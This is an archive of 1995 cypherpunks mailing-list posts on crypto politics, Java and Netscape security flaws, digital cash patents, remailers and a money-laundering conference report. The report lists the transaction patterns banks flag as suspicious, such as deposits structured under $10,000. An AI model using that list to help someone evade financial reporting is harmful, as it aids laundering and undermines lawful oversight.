transactions are being effected, nor for any fraudulent purposes. Discovery
of this conduct by OAR will be a basis for immediate termination of the account.


Date: ___________________________	______________________________
						Client's Signature







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: blancw@accessone.com
Date: Sun, 8 Oct 95 21:12:03 PDT
To: cypherpunks@toad.com
Subject: Re: Crypto's Role in Evil?
Message-ID: <9510090412.AA02181@pulm1.accessone.com>
MIME-Version: 1.0
Content-Type: text/plain



The cpunks like to avoid bringing up these issues because they become so 
complex, convoluted, involved, & protracted, but these comments from Timothy C. 
May are real discussion-bait.

In the past, when I have read the non-libertarians on the list argue against 
the ideas of those libertarian/anarcho-capitalist cyphertypes on the list, but 
who nevertheless also involve themselves with the mechanics and successful 
implementation of unbreakable crypto ("strongly voluntary", of course), I have 
wondered if they had thought much on what this would be making possible in the 
real world of future events, since it would involve such activities as Tim 
outlined - possibilities which their philosophical sympathies would 
compellingly induce them to call for strong controls against its widespread, 
easy employment.

TCM:  "In the view of some of us, strong crypto and the swirl of ideas called 
"crypto anarchy" will mean that the transactions people enter into are the ones 
they wish to enter into.
      ....
Indeed. And crypto anarchy will make this information liquid and widely
available, perhaps even stimulating the production of even more such data
by various means."


One thing I can think of, since crypto is supposed to level out the playing 
field, is that those who are aware of how this information is being got (the 
methods and means by which it is being obtained) will also have the means to 
communicate this information to those who have an interest (nay, a stake) in 
knowing about it.

[Conspiracy theories abounding.  This makes me think of a movie I saw once set 
in the French pre-revolutionary period, where Marquises and other mukkety-muks 
were at an elaborate evening dance.  Everyone was secretly passing around 
messages on little pieces of paper, each of which said "kill so& so".  It was 
an exciting, eventful evening.]

Another thought is that as people become more separated into individual 
self-reliance, they must develop other ideas, organizations, or means by which 
they may defend themselves from abuse.  That is, if they cannot rely on 
governments (as they come to realize that governments don't make much 
difference in terms of salvation), then individuals must become more 
imaginative over how they can defend themselves against those who are not so 
conscientious in upholding a sense of personal honor & moral rectitude.

Perhaps the new cyberage would assist in the spread of such ideas as well 
(perhaps even using the new mind-wave machines).

As people keep repeating, "May you live in interesting times."

  ..
Blanc





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Sun, 8 Oct 95 21:14:06 PDT
To: "Perry E. Metzger" <perry@piermont.com>
Subject: Re: Java
In-Reply-To: <199510090017.UAA00652@jekyll.piermont.com>
Message-ID: <Pine.SOL.3.91.951008204557.13119A-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


Perry - 
  This has come up several times on the java list; some of them are 
covered in the papers on java security, but there's no reason to believe 
that the treatment in those papers is necessarily correct. Given the fact 
that it has proved possible to core-dump the jvm interpreter in the 
past, it's possible there may be security leaks in the implementations out 
there. 

If anybody is going to perform a more rigorous evaluation of the both the 
theoretical security model, and of the re-ified systems curently extant, 
looking at java the language is not the best place to start. A much 
better place to start is to look at the class loader and the java VM

The major assumptions needed to allow for security are:

	1. It's impossible to upwards modify the JVM  call stack.
	2. It's impossible to construct a pointer to an object except via 
	   controlled calls to the JVM
	3. It's impossible to store a value of one type and access it as 
	   another.
	4. It's impossible to access non-public fields of an object

I'm not sure if these are sufficient; however they do present the most 
promising candidates for attacks. 

If 1 is false, then it becomes possible for a remote class to pretend 
to be a local class, and thus gain access to the file and networked classes.

If 2 is false, then the method gains un-restricted access to memory.
3 is similar to 2 - if you can turn an int into a pointer, you've won.

4 is imporant for many reasons - one obvious use is to change the the 
class-loader in a remote class to disguise it's origin, with the same 
result as 1. 

Any attack on the Java VM should start with the verifier in the 
class-loader. This is supposed to prevent 2 & 3. One of the sun papers 
refers to the verifier as a theorem prover- to me this implies that the 
design has been formally verfied, but then we know how much that's worth, 
don't we Phil :-)

BTW, source code for the Java VM is available for no cost; you just need 
to send in a request to the java team, and a notarised affidavit 
affirming that X sucks and NEWS was infinitely cooler.

See the java pages for more info  (http://java.sun.com/)

Simon
p.s.
	Strange fact: There's a reference to one of Allan Schiffman's papers 
in the first Java security paper's bibliography. The paper has nothing to do 
with S-HTTP or any other aspect of security. There also doesn't seem to 
be any actual cite in the paper itself. Go Fig...







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@dcs.exeter.ac.uk
Date: Sun, 8 Oct 95 13:19:04 PDT
To: ecm@ai.mit.edu
Subject: Re: Chaum patent prices
Message-ID: <18416.9510082018@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



Tim wrote in his (to me) spot on article (cypherpunks list) about
patents wrecking technolgical progress, and hindering all important
experimentation, and exploration of technology:

> [...]  for example, can't use the Chaumian blinding protocols
> without hiring lawyers, paying Chaum his up-front fee, and laying
> out his designs and business plans (which he very probably doesn't
> even have!).

from Marcel's post:

> I just want to make a quick comment on the prices that have been
> floating around on this list ($150K +10%). No doubt this is what
> David asked at some point to some individual but it is NOT the
> 'list price' -- there is no such thing as a list price. It all
		  ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
> depends on the application, business potential etc.
  			      ^^^^^^^^^^^^^^^^^^^^^^

ie laying your plans out up front, plans which don't exist!  Business
potential is not predictable, even obtaining appropriate status, and
banking licenses would presumably be doubtful unless a concerted,
organised effort were put together.  Requiring business plans rules
out experimenting.  The freeware mosaic browsers growth while being
developed by academia, and the WWW in general seems to be a model
which works rather well for the internet, if the netscape success
story is anything to go by.  

Internet payment is rather harder to set up as a small experimental
operation due to the legal and political implications, but a *real*
example by Digicash would be nice.  As in: if no licensing banks for
digicash can be found, perhaps it would be a good approach for
digicash to do it themselves, and support an offical exchange
mechanism, if such a mechanism took off, banks might be interested to
buy into an existing client base.

On the $150k + 10% figures, my apologies, I picked them up from
earlier posts on ecm I think, and had assumed incorrectly that this
was a fixed price.

> The up-front patent price should never be an obstacle for setting up
> business. If you wanna do serious business, I suggest to give David
> Chaum a call, or call Dan Eldridge. Phone numbers and email addresses
> can be found on our web pages. You might be surprised.

I am tempted to say: "how about free for a good cause :-)"

And it might (theoretically) be nice as an analogue of the
relationship between PGP and RSA with PGPs current free non-commercial
use license from RSA, that seems to have helped RSA quite a lot.  RSA
are fond of quoting statistics about the world wide usage of their
algorithms, one rather suspects that PGP is included and a major
contributer to their figures :-)

However, being realistic, I expect the answer to be no.  I can
understand this, but IMO it is still not a good situation from the
point of view of advancing technology.

My point however, is lets see a digicash payment system with a real
exchange and soon!  I don't care who does it so long as it gets done!

> And may I remind you that the patent price that is quoted is just a
> tiny drop in the bucket compared to the kind of money spent on
> marketing budgets for systems like Mondex!!! You are really talking
> about a non-issue here, IMHO.

True enough.  The 10% is likely more of a sticking point tho, but as
you say this is all negotiable.  But hey, I don't have a high powered
business plan, I'm just a little cypherpunk be-moaning the fact that
there are no digicash licensing banks which I can use to take
advantage of Chaum's privacy technology, and instant on-line buying.

Just think how much hassle could be saved when buying the perl rsa
T-shirts even (no, I promise no more shirts arguments, I'm talking of
payment!), all the foreign cheques, the hugely exhorbitant charges
banks charge for writing small value foreign currency cheques, the
risks (and dubious technical legality in some places) of posting paper
cash in the mail, and the odd postal order which the bank would like
to charge more than the face value to cash (I kid you not, I asked a
few people to send different payment forms).

"Click here to buy" would be infinitely better.

The market is impatient, and inferiour, non-privacy preserving payment
forms are in danger of soon becoming entrenched as standard internet
payment methods.

Digicash has or soon will have MSN money systems to compete with.

Digicash now!

Adam
--
#!/bin/perl -s-- -export-a-crypto-system-sig -RSA-3-lines-PERL
$m=unpack(H.$w,$m."\0"x$w),$_=`echo "16do$w 2+4Oi0$d*-^1[d2%Sa
2/d0<X+d*La1=z\U$n%0]SX$k"[$m*]\EszlXx++p|dc`,s/^.|\W//g,print
pack('H*',$_)while read(STDIN,$m,($w=2*$d-1+length($n)&~1)/2)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@dg.thepoint.net>
Date: Sun, 8 Oct 95 18:27:56 PDT
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: Certification Authorities in history.
In-Reply-To: <199510080718.AAA02155@ix5.ix.netcom.com>
Message-ID: <Pine.D-G.3.91.951008213248.3807B-100000@dg.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 8 Oct 1995, Bill Stewart wrote:

> Timothy C. May (or somebody like him, or Tim the Enchanted) wrote:
> >> The talk of certification authorities is OK, so long as the practice is
> >> _completely_  and "strongly" voluntary (*).
> 
> It occurred to me that the authors of the US Constitution had 
> direct experience with the equivalent of mandatory certification hierarchies
> for legally acceptable digital signatures.
> 
> They called it "The Stamp Act".  
> 
> If you wanted to make a legal document, such as a contract or will, 
> it needed to be on paper with a tax stamp on it; I forget if this was
> a watermark or a stick-on stamp, but you could only get it from the authorities.
> 
> They didn't like it.  There was also a few-percent sales tax on tea around
> that time.  They didn't like that either :-)

But their principal reason for disliking it was "Taxation without 
representation."  Today, you get to vote on those who decide on taxes, 
unlike the colonists ....

EBD




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: an402976@anon.penet.fi (RingZero)
Date: Sun, 8 Oct 95 14:45:48 PDT
To: cypherpunks@toad.com
Subject: Re: NEW Netscape RNG hole
Message-ID: <9510082136.AA03945@anon.penet.fi>
MIME-Version: 1.0
Content-Type: text/plain




Phil argues this file handle being lost isn't a big mistake.
He describes how the function is actually called, which
does indeed show that it shouldn't be much of a problem.
However, Netscape had not revealed enough information about
their RNG to allow myself or other reviewers to determine how
critical it was. If, for example, this seeding function were
called once every time a secure connection were established,
losing a handle would be a major problem.

This seems like a good reason to ask for the code for
SEC_RandomUpdate(). You show us from what sources you gather bits,
but you don't show us how you mix them or, for that matter,
stream out "random" bits.

If you did have a description in your original published code
that was better than "mixing is accomplished with MD5", I
must've missed it.


RingZero

===========
From: Phil Karlton  <karlton@netscape.com>
Subject: Re: NEW Netscape RNG hole
Date: Sunday, October 08, 1995 1:39AM

RingZero wrote:
>
> Did anyone else notice a bug in the new, public Netscape
> RNG code? It appears that on Windows builds, during the
> RNG seeding, the function that hashes in file contents
> (EnumSystemFiles) doesn't close a file handle (lFileHandle).

I think you mean lFindHandle. I'm not a windows programmer, so I have
no idea if the enumerator needs to be cleaned up, but I will forward
your message to the appropriate folks here.

[...]

--****ATTENTION****--****ATTENTION****--****ATTENTION****--***ATTENTION***
Your e-mail reply to this message WILL be *automatically* ANONYMIZED.
Please, report inappropriate use to                abuse@anon.penet.fi
For information (incl. non-anon reply) write to    help@anon.penet.fi
If you have any problems, address them to          admin@anon.penet.fi




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Sun, 8 Oct 95 20:23:20 PDT
To: austin-cpunks@einstein.ssz.com (Austin Cypherpunks)
Subject: Nov. meeting: Austin, Tx
Message-ID: <199510090319.WAA00817@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Hi all,

The next meeting of the Austin Cypherpunks will be on Nov. 7 from 6-8pm at
Ted's Greek Restaraunt on Congress at 4th. near Oscar Snowden. We will be
meeting in the rear.

The get together yesterday was pretty well attended with 5 person as well as
Strick from the California cpunks.

Thanks to those who attended and hope to see more of those who didn't at the
next meeting.

                                           Jim Choate
                                           CyberTects
                                           ravage@einstein.ssz.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@dg.thepoint.net>
Date: Sun, 8 Oct 95 19:12:10 PDT
To: Hal <hfinney@shell.portal.com>
Subject: Re: Certification Authorities in history.
In-Reply-To: <199510081726.KAA10621@jobe.shell.portal.com>
Message-ID: <Pine.D-G.3.91.951008221847.4800A-100000@dg.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 8 Oct 1995, Hal wrote:

> One key to rule them all;
> One key to find them;
> One key to bring them all
> And in the darkness bind them.

In the land of Langley, where the shadows lie.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cman@communities.com (Douglas Barnes)
Date: Sun, 8 Oct 95 22:24:48 PDT
To: cypherpunks@toad.com
Subject: Conference Summary, Part the First
Message-ID: <v02120d07ac9e557bab94@[199.2.22.120]>
MIME-Version: 1.0
Content-Type: text/plain




INTRODUCTION

As you may know, I attended the Fourth International conference
on Money Laundering, Forfeiture, Asset Recovery, Offshore Investments,
the Pacific Rim and International Financial Crimes last week. I
will be dribbling my trip report out over the next week.

The conference was attended primarily by lawyers, bank "compliance
officers", law enforcement personnel and federal regulators. There
were several main themes through the conference:

  o How existing and soon-to-exist regulations affect banks and
    NBFIs (Non-bank financial institutions) with respect to money
    laundering.

  o How the US is projecting its notions of fiscal propriety around
    the globe.

  o Scary stories about things bad people do.

There were also a few bits that prevented it from being a complete
pro-law-enforcement rally, including an interesting bit on foreign
asset protection trusts and a single speaker who dared to suggest that
if we stopped treating drugs as a law enforcement problem, perhaps we
wouldn't have such a serious problem with money laundering. There was
also the bizarre substitution of a marketroid from First Virtual for one
of the speakers.

Despite this somewhat bleak description, it was extremely educational,
and, I think quite useful -- the utility coming not so much from the
explicit content, but rather from the subtext of the talks, the
interactions between the different parties, the hallway conversations,
and the vast tracts of ignorance with respect to cyberspace that were
displayed (and, to be honest, openly admitted) in some of the talks.

Some quick morsels of interest:

  o Regulators are not amused by attempts to run unlicensed online
    banks. They are aware such things are starting to pop up, and
    they are very interested in shutting them down when they do.

  o The same goes for NBFIs (Non-bank financial institutions) --
    these appear to be regulated primarily at the state level, with
    some IRS and FinCEN involvement. These include everyone from
    stock brokers to Casas de Cambio. (I shared a table with a lawyer
    from Chula Vista who represents some of these guys -- he had a
    wonderful sense of humor and we began to worry we'd get chucked
    out for laughing at the wrong parts of the presentations.)

  o The attendees displayed an understanding of the situation wrt
    electronic payment systems that ran from dim to non-existent. A
    surprisingly large number of them had heard of David Chaum, who
    apparently has been hob-nobbing with them a bit. I don't think
    much of what he's said has sunk in, beyond some acquisition of
    the notion that non-anonymous systems can pose privacy problems.


THE _REALLY_ SCARY PART
New Regulations Coming, Old Regulations Reinterpreted

Recent legislation and regulation on money laundering is moving
in the following direction:

  o Fewer formal, specific or deterministic rules for reporting
    suspicious transactions.

  o More vague, subjective, and privacy-invading rules for
    reporting suspicious transactions, coupled with more severe
    penalties for banks and NBFIs.

More specifically ("bank" includes NBFIs):

  o Banks are now considered "deputies" of the federal government
    in the War On Money Laundering.
  o Banks have an affirmative duty to use their resources to seek
    out and report on suspicious activity.
  o Banks must implement strict "Know Your Customer" policies.
  o If money launderers are found to be using a bank, a bank
    can be closed down (Under Annunzio-Wylie "death penalty"
    provisions); penalties are mitigated if:

    o Senior officers are aware of and pushing for compliance
      with m.l. regulations.
    o Bank has strong controls that were thwarted in a new or
      unusual way.
    o Bank cooperated (and has a history of cooperating with)
      Law Enforcement Agencies, including appropriate filing
      of Currency Transaction Reports (CTRs), Suspicious Activity
      Reports (SARs) and Criminal Referral Forms (CRFs).
    o Bank instituted new controls after m.l. incident.
    o Removal of bank would harm community.

The primary representative of the regulators, Dan Sato, made it
very clear that it was not the government's job to define
"suspicious" behavior, but that this was up to the banks. This
has the effect of causing the banks to implement far more
restrictive and invasive policies than the government could ever
explicitly mandate.

Those of you who have recently experienced new account paranoia
at banks should take note -- it's going to get much, much worse.
Current compliance measures being used or proposed for use by the
industry itself include:

 o Increased ID requirements for new accounts, including bank
   references, follow-up investigation, flagging of mail-drop
   addresses, etc. One attendee described some software to detect
   new account fraud in glowing terms.

 o Use of transaction profiling to detect unusual patterns; use of
   AI at banks to turn them into mini-FinCENs.

 o Pre-loading transaction profiling with a detailed questionnaire
   given to customers when account is opened: "Do you plan to make
   any large cash transactions?", "Do you plan to send or receive
   any wire transfers?" -- answers trigger further investigation
   and documentation of the customer's reson for using these services.

Note that equivalent measures and software are enthusiastically
embraced by the people involved in NBFIs, including a
representative of a large money transmitter I spoke with.

Most of the discussions on the subject of bank regulation wrt
money laundering featured some input from John Byrne, a lobbyist
for the American Banker's Assocation, and, for reasons which
are clear, "the first private sector recipient of FinCEN's
Director's Medal for Exceptional Service." Mr. Byrne continued to
provide exceptional service for the government throughout the
conference, a model of government-industry cooperation.

It is important for people not involved in the banking industry
to realize that it is very tightly regulated, with a good deal of
highly subjective lattitude given to bank examiners. There is
very little due process available to banks wrt the judgements made
by examiners, and banks wisely do whatever they can to avoid
irritating the government. The alternative is higher fines and
less benefit of the doubt when they inevitably screw up and
violate one of the yards of regulations affecting them. [I am
continuing to research how control is extended to NBFIs.]

This enthusiastic compliance is not too surprising. In
fact, one of the recurring complaints from the bankers was that
over the years they had dutifully filed Suspicious Activity Reports
and Criminal Activity Forms and nothing ever happened; as a reward
for their concerns, they now have an affirmative duty to follow
up on these forms if they don't hear back from an appropriate LEA.
(Failure to follow up is now considered a form of willful blindness.)

And finally, for your entertainment and edification, here are some
examples of "suspicious behavior", generally:

o Insufficient, false, or suspicious information provided by
  the customer.

o Cash deposits, purchase and/or deposits of monetary instruments,
  or wire transfers which are not consistent with the business activities
  of the customer. (Ponder for a bit how closely a bank has to understand
  you and your business to make this determination.)

o Structuring of transactions to avoid reporting requirements (a
  running joke in the conference was that a $9,500 cash transaction
  is far more suspicious than a $24,000 one.)

o Funds transfer to foreign countries.

More specifically:

o Customer is reluctant to provide information requested for
  proper identification.

o Customer opens a number of accounts under one or more names and
  subseqently makes deposits of less than $10K in one or more of them.

o Customer is reluctant to proceed with transaction after being
  informed that a CTR will be filed.

o Customer makes frequent deposits or withdrawals for no apparent
  business reason, or for a business which generally does not involve
  large amounts of cash. (Again, ponder the process of determining
  this.)

o Customer exchanges large amounts of currency from small to large
  denomination bills.

o Customer makes frequent purchases of monetary instruments for cash
  in amounts less than $10K.

o Customers who enter the bank simultaneously and each conduct a large
  currency transaction under $10K with different tellers.

o Customer who makes constant deposits of funds into an account and
  almost immediately requests wire transfers to another city or
  country, and that activity is inconsistent with the customer's
  stated business.

o Customer who receives wire transfers and immediately purchases
  monetary instruments for payment to another party.

o Traffic patterns of a customer change in the safe deposit box
  area possibly indicating the safekeeping of large amounts of cash.

o Custmoer discusses CTR requirements with apparent intention of
  avoiding those requirements or makes threats to an employee to deter
  the filing of a CTR.

o Customer's wire traffic increases, esp. if international

o Customer receives many small incoming wire transfers or deposits
  of checks and money orders then requests wire transfers to another
  city or country.

o Large wire transfers less than $10K to nonaccountholders, esp.
  in conjunction with purchase of monetary instruments.

o Customer's stated purpose for a loan does not make economic sense,
  or customer proposes cash collateral for a loan while refusing to
  disclose the purpose of a loan.

o Requests for loans to offshore companies, or loans secured by the
  obligations of offshore banks.

o Borrower pays down a large problem loan suddenly, with no reasonable
  explanation of the source of funds.

o Customer purchases CDs and uses them as collateral, or uses any
  cash collateral for a loan.

o Loan proceeds are unexpectedly channeled off-shore.

[More to come.]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Sun, 8 Oct 95 20:07:35 PDT
To: perry@piermont.com
Subject: Re: Java
In-Reply-To: <199510090017.UAA00652@jekyll.piermont.com>
Message-ID: <199510090307.XAA10293@clark.net>
MIME-Version: 1.0
Content-Type: text/plain



  Well those concerns are all fine and swell, but the same kind
of reasoning applies to any network application. There are buffer overflow
bugs in almost every web browser, there are overflow bugs in CERN HTTPD3.0,
and who knows, there are probably bugs in ELM/PINE. Millions of people
download software from the internet without seeing the source code
everyday and risk getting hit by trojan horses and viruses. People
make all kinds of transactions everyday where they rely on nothing more
than trust. (and a future tit-for-tat legal suit if possible) I am of
the opinion that risk is good. Java will not be perfect. There will
be holes, I'm sure of it. And each generation of web languages will be
more efficient and more secure, but none will ever be perfect. It's all
part of evolution. It's a problem that will be researched and
improved on, but you've got to break some eggs to make a cake
somewhere. 

  And the situation without Java is not much better. Most of Java 
functionality is faked with CGI scripts, usually written in perl,
and there are plenty of ways to screw up a CGI implementation to allow
holes.

  As I mentioned before, Java file i/o is not built into the language.
It is provided through a Java class you can use that implements native C code
methods. This is where the write restrictions are handled. All that is
needed to remove the ability to do file i/o is to delete this class
from your installation. It's like having C, but no standard library.

  Java is mostly a risk to consumers (the users with the browsers), and
not corporate networks who are running servers, *unless* the employees
are using Java on the firewalled network. 

  Java is a lot better than the situation with microsoft network, whereby
a user can send you a 386 executable, and it shows up with an icon
saying "click me" on your desktop, and clicking on it will run it.

-Ray






 
 



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: patrick@Verity.COM (Patrick Horgan)
Date: Sun, 8 Oct 95 23:11:26 PDT
To: schampeo@imonics.com
Subject: Re: Netscape 2.0 beta
Message-ID: <9510090607.AA02381@cantina.verity.com>
MIME-Version: 1.0
Content-Type: text/plain


Steven Champeon said:

> One thing that I found with the newsreader was that it doesn't
> do POP correctly. No matter what you do with your mail, it still
> doesn't check for read vs. unread articles. This is fine when you
> have a mailbox with one message. It can be annoying when you have
> 110 messages in your mailbox and don't want to 1) delete them or
> 2) download them twice.

Neither pop 2 nor pop 3 tell you whether you've read a message or not.
pop 2 does bump up the current number with an ACKS, but if you move around
with READ n, then that's useless.  pop 3 doesn't do that.

I just reread the rfcs to make sure that I wasn't missing anything,
(RFC 1725: Post Office Protocol - Version 3, RFC 937: Post Office Protocol -
Version 2).  Am I missing something?

Patrick
   _______________________________________________________________________
  /  These opinions are mine, and not Verity's (except by coincidence;).  \
 |                                                       (\                |
 |  Patrick J. Horgan         Verity Inc.                 \\    Have       |
 |  patrick@verity.com        1550 Plymouth Street         \\  _ Sword     | 
 |  Phone : (415)960-7600     Mountain View                 \\/    Will    | 
 |  FAX   : (415)960-7750     California 94303             _/\\     Travel | 
  \___________________________________________________________\)__________/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sun, 8 Oct 95 20:25:57 PDT
To: Ray Cromwell <rjc@clark.net>
Subject: Re: Java
In-Reply-To: <199510090307.XAA10293@clark.net>
Message-ID: <199510090325.XAA04766@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Ray Cromwell writes:
>   Well those concerns are all fine and swell, but the same kind
> of reasoning applies to any network application. There are buffer overflow
> bugs in almost every web browser, there are overflow bugs in CERN HTTPD3.0,
> and who knows, there are probably bugs in ELM/PINE.

I believe that the security related ones in those applications are
well within human ability to fix -- simply implementing some hygenic
coding practices stops them. I don't believe that is the case with
Java implementations. I don't know how I'd manage to produce a "safe"
Java. Its a neat programming language, by the way -- its only when you
rig yourself to automatically run code produce by hostile people that
the issue comes up.

>   And the situation without Java is not much better. Most of Java 
> functionality is faked with CGI scripts, usually written in perl,
> and there are plenty of ways to screw up a CGI implementation to allow
> holes.

Thats true, but again, there is the alternative of gaining the
functionality with truly safe languages.

>   Java is mostly a risk to consumers (the users with the browsers), and
> not corporate networks who are running servers, *unless* the employees
> are using Java on the firewalled network. 

Unfortunately, it will be very hard to stop people from doing just
that.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: scs@lokkur.dexter.mi.us (Steve Simmons)
Date: Sun, 8 Oct 95 18:13:41 PDT
Subject: Re: The Ultimate GUK[TM] (Globally Unique Key) Biotech Racket
In-Reply-To: <199510090009.UAA19196@array1.arraydev.com>
Message-ID: <1995Oct9.011154.26189@lokkur.dexter.mi.us>
MIME-Version: 1.0
Content-Type: text/plain


Nahum.Goldmann@ARRAYdev.com (Nahum Goldmann) writes:

>No problem.  The ultimate way to ensure that keys are globally unique is to
>link them to the person's own genetic code.  Fingers they might cut, but...

Two words: identical twins.

Two more workds: gene therapy.

The first generates non-unique keys, the second makes the code modifiable.
-- 
"For the last five years, the number of machines on the network has been
rising between five and 10 times faster than the number of transistors
on a chip."  `THE COMING SOFTWARE SHIFT' by George Gilder, Forbes, 8/8/95




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Mon, 9 Oct 95 00:12:28 PDT
To: patrick@Verity.COM (Patrick Horgan)
Subject: Re: Netscape 2.0 beta
In-Reply-To: <9510090607.AA02381@cantina.verity.com>
Message-ID: <199510090712.DAA06375@clark.net>
MIME-Version: 1.0
Content-Type: text/plain



  Netscape should be supporting IMAP instead of POP. POP has a tendency
to hose your mailbox and lose mail every once in awhile.

-Ray




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stu@nemesis (Stuart Smith)
Date: Mon, 9 Oct 95 04:22:24 PDT
To: fair@clock.org
Subject: Re: Rethinking the utility of netnews "cancel" control messages
In-Reply-To: <v02110105ac99c03922dd@[204.179.132.4]>
Message-ID: <m0t2Ffg-0000VgC@nemesis>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <v02110105ac99c03922dd@[204.179.132.4]> you write:
>The downsides of having the mechanism (especially unauthenticated) we see
>now: official and unofficial squelching of articles that someone doesn't
>like for whatever arbitrary or situational reason.

You miss an important point in the mechinism - individual sites *choose*
whether or not to pay any attention to cancels.  Theoretically, they could
be configured to only listen to cancels from certain places etc etc.  By all
means these should be authenticated, but it is vital to remember that this
is still (for now..) an anarchy.  I don't have to honour anyones cancels,
and if I do, and you don't like it - you don't have to get a news feed from
me.

- --
 Baba baby mama shaggy papa baba bro baba rock a shaggy baba sister
shag saggy hey doc baba baby shaggy hey baba can you dig it baba baba
E7 E3 90 7E 16 2E F3 45  *   Stuart Smith  *  28 24 2E C6 03 02 37 5C 
     <stu@nemesis.wimsey.com>  *  http://www.wimsey.com/~ssmith/

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMHj8pqi5iP4JtEWBAQHI+QP/dy3e6AfQ4OjRLjM723i8ZBCGSJdN7N8i
Iw6E+UwhkZxt5aEq6KQHr72TkGbz6wgUMOCFsdK0cJjpt3ubgi1RYjDiQPeYswkp
zK6/hnUnbpKAUE7h2BWLO+VYyoxxySCydigUthxWrG3p25eDJTYVhAw5gKsLrOJp
k/HDHNQ2IG8=
=ZBAz
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Mon, 9 Oct 95 03:44:46 PDT
To: cypherpunks@toad.com
Subject: The problem with Java
Message-ID: <9510091042.AA13473@all.net>
MIME-Version: 1.0
Content-Type: text


The way I see it, the real problem with Java is that there is no
clear statement of the "security" goals it is supposed to attain.
It's one thing to declare a concept or an implementation "secure"
but it's quite another to tell us what the security claims are and
demonstrate that they are met.  Specifically:

	Do the makers of Java claim it can authenticate the
	source of programs it runs?

	Do the makers of Java claim it can prevent someone from using
	your client to attack other servers?

	Do the makers of Java claim it can prevent denial of services or
	consumption of all available resources on the client machine?

	Do the makers of Java claim it can maintain integrity or
	confidentiality of something?

I have read the white paper on Java and I still don't know the answer to
these questions.  Until I do, it's hard to assess the "security" of
Java, but I can tell you this.  I bet that at least two, probably three,
and maybe even all four of these are not accomplished by Java. 

-- 
-> See: Info-Sec Heaven at URL http://all.net Management Analytics -
216-686-0090 - PO Box 1480, Hudson, OH 44236




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Mon, 9 Oct 95 06:50:39 PDT
To: cypherpunks@toad.com
Subject: List of reliable remailers
Message-ID: <199510091350.GAA12733@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


   I operate a remailer pinging service which collects detailed
information about remailer features and reliability.

   To use it, just finger remailer-list@kiwi.cs.berkeley.edu

   There is also a Web version of the same information, plus lots of
interesting links to remailer-related resources, at:
http://www.cs.berkeley.edu/~raph/remailer-list.html

   This information is used by premail, a remailer chaining and PGP
encrypting client for outgoing mail, which is available at:
ftp://ftp.csua.berkeley.edu/pub/cypherpunks/premail/premail-0.33.tar.gz

   For the PGP public keys of the remailers, finger
pgpkeys@kiwi.cs.berkeley.edu

This is the current info:

                                 REMAILER LIST

   This is an automatically generated listing of remailers. The first
   part of the listing shows the remailers along with configuration
   options and special features for each of the remailers. The second
   part shows the 12-day history, and average latency and uptime for each
   remailer. You can also get this list by fingering
   remailer-list@kiwi.cs.berkeley.edu.

$remailer{"extropia"} = "<remail@extropia.wimsey.com> cpunk pgp special";
$remailer{"portal"} = "<hfinney@shell.portal.com> cpunk pgp hash";
$remailer{"alumni"} = "<hal@alumni.caltech.edu> cpunk pgp hash";
$remailer{"bsu-cs"} = "<nowhere@bsu-cs.bsu.edu> cpunk hash ksub";
$remailer{"c2"} = "<remail@c2.org> eric pgp hash reord";
$remailer{"penet"} = "<anon@anon.penet.fi> penet post";
$remailer{"ideath"} = "<remailer@ideath.goldenbear.com> cpunk hash ksub reord";
$remailer{"hacktic"} = "<remailer@utopia.hacktic.nl> cpunk mix pgp hash latent cut post ek";
$remailer{"flame"} = "<remailer@flame.alias.net> cpunk mix pgp. hash latent cut post ek reord";
$remailer{"rahul"} = "<homer@rahul.net> cpunk pgp hash filter";
$remailer{"mix"} = "<mixmaster@remail.obscura.com> cpunk mix pgp hash latent cut ek ksub reord";
$remailer{"syrinx"} = "<syrinx@c2.org> cpunk pgp hash cut reord mix post";
$remailer{"ford"} = "<remailer@bi-node.zerberus.de> cpunk pgp hash ksub";
$remailer{"hroller"} = "<hroller@c2.org> cpunk pgp hash mix cut ek";
$remailer{"vishnu"} = "<mixmaster@vishnu.alias.net> cpunk mix pgp hash latent cut ek ksub reord";
$remailer{"crown"} = "<mixmaster@kether.alias.net> cpunk pgp hash latent cut mix ek reord";
$remailer{"robo"} = "<robo@c2.org> cpunk hash mix";
$remailer{"replay"} = "<remailer@replay.com> cpunk mix pgp hash latent cut post ek";
$remailer{"spook"} = "<remailer@spook.alias.net> cpunk mix pgp hash latent cut ek reord";
